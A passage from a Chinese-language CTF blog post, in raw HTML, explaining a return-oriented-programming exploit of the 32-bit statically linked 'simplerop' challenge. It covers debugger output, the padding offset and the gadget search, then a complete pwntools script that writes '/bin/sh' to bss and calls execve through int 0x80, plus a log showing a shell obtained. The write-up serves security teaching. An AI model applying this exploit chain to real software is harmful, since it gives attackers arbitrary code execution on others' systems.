───────────────────────────────────────────<span class="token punctuation">[</span>REGISTERS<span class="token punctuation">]</span>────────────────────────────────────────────────
*EAX  0x64
 EBX  0x80481a8 <span class="token punctuation">(</span>_init<span class="token punctuation">)</span> ◂— push   ebx
*ECX  0xffffd0dc ◂— <span class="token string">'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'</span>
*EDX  0x64
 EDI  0x80ea00c <span class="token punctuation">(</span>_GLOBAL_OFFSET_TABLE_+12<span class="token punctuation">)</span> —▸ 0x80677d0 <span class="token punctuation">(</span>__stpcpy_sse2<span class="token punctuation">)</span> ◂— mov    edx, dword ptr <span class="token punctuation">[</span>esp + <span class="token number">4</span><span class="token punctuation">]</span>
 ESI  0x0
*EBP  0x61616168 <span class="token punctuation">(</span><span class="token string">'haaa'</span><span class="token punctuation">)</span>
*ESP  0xffffd100 ◂— <span class="token string">'jaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'</span>
*EIP  0x61616169 <span class="token punctuation">(</span><span class="token string">'iaaa'</span><span class="token punctuation">)</span>
──────────────────────────────────────────<span class="token punctuation">[</span>DISASM<span class="token punctuation">]</span>────────────────────────────────────────────────────
Invalid address 0x61616169
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>发现会报<code>Invalid address 0x61616169</code>，我们把<code>0x61616169</code>复制，终端输入</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">pwndbg<span class="token operator">></span> cyclic <span class="token parameter variable">-l</span> 0x61616169
<span class="token number">32</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>得到<code>32</code>，也就是实际的padding长度，<code>0x20</code></p>
<p>接着还需要一些gadgets，我们需要控制寄存器里面的内容来控制函数的参数。<code>int80(11 , '/bin/sh' , 0 , 0)</code>可以看到需要4个值，分别对应的寄存器是<code>eax</code> , <code>ebx</code> , <code>ecx</code> , <code>edx</code></p>
<p>还是通过ROPgadget来搜索</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">0x0806e850 <span class="token builtin class-name">:</span> pop edx <span class="token punctuation">;</span> pop ecx <span class="token punctuation">;</span> pop ebx <span class="token punctuation">;</span> ret<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>拿到可以控制<code>edx</code> , <code>ecx</code> , <code>ebx</code>的gadgets，还差<code>eax</code></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">0x080bae06 <span class="token builtin class-name">:</span> pop eax <span class="token punctuation">;</span> ret<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>找到一条单独的，gadgets就找完了</p>
<p>由于这个程序没有开启pie，那bss段绝对地址不会发生改变，我们就可以将<code>/bin/sh</code>写入bss段，再进行调用</p>
<p>有了这些前置条件，就可以来构造ropchain了</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">payload <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> padding <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>payload第一部分是padding，覆盖函数返回地址，跳向哪里呢，下一步，我们需要调用read来向bss段上去读入<code>/bin/sh</code>，所以跳向read()</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>read_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>pop_edx_ecx_dbx<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0x8</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>read()函数需要三个参数，我们就可以通过之前找到的<code>pop edx ; pop ecx ; pop ebx ; ret</code>来控制参数，从标准输入流中读取数据到bss段去，读取多少呢，只要比<code>/bin/sh</code>长就行，可以给个8。那么这里三个参数就是read(0 , bss_addr , 0x8)</p>
<p>下一步，开始系统调用</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span>pop_eax<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0xb</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>pop_edx_ecx_ebx<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>int_80<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>首先是给四个寄存器复制，然后接着进行<code>int 0x80</code>，系统调用号为<code>11</code>，也就是<code>0xb</code>，所以eax为<code>0xb</code>，后面的寄存器赋值就是按照<code>('/bin/sh' , 0 , 0)</code>进行的，依次赋给这三个寄存器，然后跳到<code>int 0x80</code>来进行系统调用，注意参数是从右往左依次入栈的，这也是这样构造payload的原因</p>
<p>至此，payload就构造完成了</p>
<p>发送完payload后，再发送<code>/bin/sh</code>写到bss段上，为后续调用做准备</p>
<h6><span id="exp">exp</span></h6>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> struct <span class="token keyword">import</span> pack
context<span class="token punctuation">(</span>os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span>arch<span class="token operator">=</span><span class="token string">'i386'</span><span class="token punctuation">,</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>
elf<span class="token operator">=</span>ELF<span class="token punctuation">(</span><span class="token string">"simplerop"</span><span class="token punctuation">)</span>
host <span class="token operator">=</span> <span class="token string">"node4.buuoj.cn"</span>
port <span class="token operator">=</span> <span class="token number">27544</span>
local<span class="token operator">=</span><span class="token builtin">int</span><span class="token punctuation">(</span><span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"0 for remote,1 for local:\t"</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
io<span class="token operator">=</span>process<span class="token punctuation">(</span>elf<span class="token punctuation">.</span>path<span class="token punctuation">)</span> <span class="token keyword">if</span> local<span class="token operator">==</span><span class="token number">1</span> <span class="token keyword">else</span> remote<span class="token punctuation">(</span>host<span class="token punctuation">,</span>port<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">"Your input :"</span><span class="token punctuation">)</span>
padding <span class="token operator">=</span> <span class="token number">0x20</span>
read <span class="token operator">=</span> elf<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'read'</span><span class="token punctuation">]</span>

int_0x80 <span class="token operator">=</span> <span class="token number">0x080493e1</span>
bss_addr <span class="token operator">=</span> <span class="token number">0x080EB584</span> <span class="token comment">#binsh is written here</span>
pop_edx_ecx_ebx <span class="token operator">=</span> <span class="token number">0x0806e850</span>
pop_eax <span class="token operator">=</span> <span class="token number">0x080bae06</span>
payload <span class="token operator">=</span> <span class="token string">b'a'</span> <span class="token operator">*</span> padding <span class="token operator">+</span> p32<span class="token punctuation">(</span>read<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>pop_edx_ecx_ebx<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0x8</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>pop_eax<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0xb</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>pop_edx_ecx_ebx<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>int_0x80<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
<span class="token comment"># gdb.attach(io)</span>
io<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">"/bin/sh"</span><span class="token punctuation">)</span>

io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">[</span>+<span class="token punctuation">]</span> Starting <span class="token builtin class-name">local</span> process <span class="token string">'/home/m1nus/elf/buu/simplerop/simplerop'</span> <span class="token assign-left variable">argv</span><span class="token operator">=</span><span class="token punctuation">[</span>b<span class="token string">'/home/m1nus/elf/buu/simplerop/simplerop'</span><span class="token punctuation">]</span> <span class="token builtin class-name">:</span> pid <span class="token number">18643</span>
exp.py:9: BytesWarning: Text is not bytes<span class="token punctuation">;</span> assuming ASCII, no guarantees. See https://docs.pwntools.com/<span class="token comment">#bytes</span>
  io.recvuntil<span class="token punctuation">(</span><span class="token string">"Your input :"</span><span class="token punctuation">)</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Received 0x23 bytes:
    b<span class="token string">"ROP is easy is'nt it ?<span class="token entity" title="\n">\n</span>"</span>
    b<span class="token string">'Your input :'</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Sent 0x51 bytes:
    00000000  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span> <span class="token number">61</span>  │aaaa│aaaa│aaaa│aaaa│
    *
    00000020  <span class="token number">50</span> <span class="token builtin class-name">cd</span> 06 08  <span class="token number">50</span> e8 06 08  00 00 00 00  <span class="token number">84</span> b5 0e 08  │P···│P···│····│····│
    00000030  08 00 00 00  06 ae 0b 08  0b 00 00 00  <span class="token number">50</span> e8 06 08  │····│····│····│P···│
    00000040  00 00 00 00  00 00 00 00  <span class="token number">84</span> b5 0e 08  e1 <span class="token number">93</span> 04 08  │····│····│····│····│
    00000050  0a                                                  │·│
    00000051
exp.py:20: BytesWarning: Text is not bytes<span class="token punctuation">;</span> assuming ASCII, no guarantees. See https://docs.pwntools.com/<span class="token comment">#bytes</span>
  io.send<span class="token punctuation">(</span><span class="token string">"/bin/sh"</span><span class="token punctuation">)</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Sent 0x7 bytes:
    b<span class="token string">'/bin/sh'</span>
<span class="token punctuation">[</span>*<span class="token punctuation">]</span> Switching to interactive mode
$ <span class="token function">whoami</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Sent 0x7 bytes:
    b<span class="token string">'whoami\n'</span>
<span class="token punctuation">[</span>DEBUG<span class="token punctuation">]</span> Received 0x6 bytes:
    b<span class="token string">'m1nus\n'</span>
m1nus
$  <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>拿到shell</p>
<p>本文主要是针对比较经典的<code>statically linked</code>程序的ROP方法进行了讲解，如果有其他方法或者问题欢迎大家下方补充</p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2022/10/16/CISCN-2022-%E5%88%9D%E8%B5%9B-ez-usb/"
      title="CISCN 2022 初赛 ez_usb"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        CISCN 2022 初赛 ez_usb
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2022/09/28/Stack-Pivoting/"
      title="Stack Pivoting"
     >

    <p class="title-text">
      
        Stack Pivoting
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>






    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2024 RST<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn hide" onclick="topFunction()">
        <i class="fa-solid fa-angle-up"></i>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.classList.remove('hide')
        } else {
            btn.classList.add('hide')
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
